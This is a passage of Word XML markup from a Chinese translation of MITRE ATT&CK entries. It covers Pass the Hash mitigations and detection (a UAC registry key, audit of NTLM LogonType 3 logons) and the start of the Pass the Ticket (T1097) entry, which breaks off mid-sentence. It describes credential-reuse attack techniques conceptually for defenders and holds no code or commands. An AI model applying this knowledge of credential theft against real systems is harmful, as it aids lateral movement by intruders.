          <w:p w14:paraId="7EA498B0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0012481B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0012481B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0B828A48" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0012481B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0012481B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="4405FD3B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FAFCF1C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId203" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>密码策略</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26A93293" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保内置和创建的本地管理员账号有复杂且唯一的密码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="266F4DE5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34D09361" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId204" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40B2CD00" w14:textId="3FD5DC98" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制跨系统的</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>重叠以防止攻击者盗取</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>并降低攻击者在系统之间横向移动的能力。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="109A246C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="170C1C51" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId205" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00E57B02">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>软件升级</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46A705E6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E57B02" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows 7</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和更高版本系统中安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>KB2871997</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>补丁，限制本地管理员群组中账号的默认访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="025A450D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0473EAE0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0012481B" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId206" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="0012481B">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>用户账号控制</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E064A38" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r>
              <w:t>tH</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>缓解措施来将</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>UAC</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用到用于</w:t>
            </w:r>
            <w:r>
              <w:t>登录网络的本地账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。关联的注册表项位于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>GPO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
              </w:rPr>
              <w:t>设置，路径如下</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：计算机配置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&gt; [</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>策略</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理模板</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&gt; SCM</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B94DF5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证哈希传递</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>缓解</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>UAC</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>到用于</w:t>
            </w:r>
            <w:r>
              <w:t>登录网络的本地账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="4AC2392C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C17BD31" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0012481B" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId207" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="0012481B">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>用户账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15C1E6DC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不允许域用户位于多个系统上的本地管理员</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>群</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0C26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>组中。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1818301E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72FAAE49" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FD19FD" w14:textId="64736A31" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审核所有登录和</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用事件，并检查是否存在差异。与其他可疑活动（例如，编写和执行二进制文件）相关的异常远程登录可能表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意活动。与域登录不相关且不是匿名登录的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NTLM LogonType 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>证是可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DAAEF1" w14:textId="2991BFC3" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00EC6EF4" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>票据传递</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w14:paraId="67D231FC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45761796" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>T1097</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E73ACA2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>技术：横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16B2A636" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:lastRenderedPageBreak/>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E9F138C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>需要</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>微软</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>作为目标系统并启用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Kerberos</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>身份</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17BDC8F7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66D35CCE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Ryan Becwar</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Vincent Le Toux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="559C4A10" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05D47927" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F63CC9" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43387029" w14:textId="1E3F029C" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>票据传递</w:t>
      </w:r>
      <w:r>
        <w:t>攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>tT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是一种不</w:t>
      </w:r>
      <w:r>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号密码</w:t>
      </w:r>
      <w:r>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:t>erberos</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>用户进行身份认证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证可以是</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>横向移动到远程系统的第一步。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6733A810" w14:textId="1662BF19" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>tT</w:t>
      </w:r>
      <w:r>
        <w:t>技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5B2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:t>导出技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:t>有效账号的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:t>erberos</w:t>
      </w:r>
      <w:r>
        <w:t>票据。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>tT</w:t>
      </w:r>
      <w:r>
        <w:t>可能会获取到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
